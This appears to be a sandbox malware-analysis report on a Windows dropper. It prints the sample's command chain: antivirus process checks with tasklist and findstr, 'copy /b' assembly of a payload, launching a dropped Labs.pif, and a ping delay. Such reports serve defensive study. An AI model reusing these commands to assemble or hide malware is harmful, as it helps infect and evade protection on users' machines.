        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007C8DE9 AdjustTokenPrivileges,CloseHandle,19_2_007C8DE9
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007C9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_007C9399
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007C8DE9 AdjustTokenPrivileges,CloseHandle,27_2_007C8DE9
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007C9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,27_2_007C9399
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_00404991 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404991
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,19_2_007D4148
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,19_2_007D443D
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\CyprusJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_03
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeFile created: C:\Users\user~1\AppData\Local\Temp\nspD039.tmpJump to behavior
        Source: lSmb6nDsrC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: lSmb6nDsrC.exeVirustotal: Detection: 68%
        Source: lSmb6nDsrC.exeReversingLabs: Detection: 60%
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeFile read: C:\Users\user\Desktop\lSmb6nDsrC.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\lSmb6nDsrC.exe "C:\Users\user\Desktop\lSmb6nDsrC.exe"
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 55116385
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SlutSteLouisTranslation" Cyprus
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Breeding + Fuji + Weather 55116385\s
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif 55116385\Labs.pif 55116385\s
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 55116385Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SlutSteLouisTranslation" Cyprus Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Breeding + Fuji + Weather 55116385\sJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif 55116385\Labs.pif 55116385\sJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: lSmb6nDsrC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007EC6D9 LoadLibraryA,GetProcAddress,19_2_007EC6D9
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_00798B75 push ecx; ret 19_2_00798B88
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_004032AC push eax; ret 27_2_004032C2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_00798B75 push ecx; ret 27_2_00798B88

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifJump to dropped file
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007F59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_007F59B3
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_00785EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_00785EDA
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_007F59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,27_2_007F59B3
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 27_2_00785EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,27_2_00785EDA
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007933B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_007933B7
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifAPI/Special instruction interceptor: Address: 7FFB2CECE814
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifAPI/Special instruction interceptor: Address: 7FFB2CECD584
        Source: Labs.pif, 0000001B.00000002.2327887079.00000000012CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKW
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 451Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 377Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 382Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifAPI coverage: 5.2 %
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifAPI coverage: 0.3 %
        Source: C:\Windows\explorer.exe TID: 6856Thread sleep count: 451 > 30Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: C:\Users\user\Desktop\lSmb6nDsrC.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_007D4005
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_007D494A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pifCode function: 19_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_007DC2FF
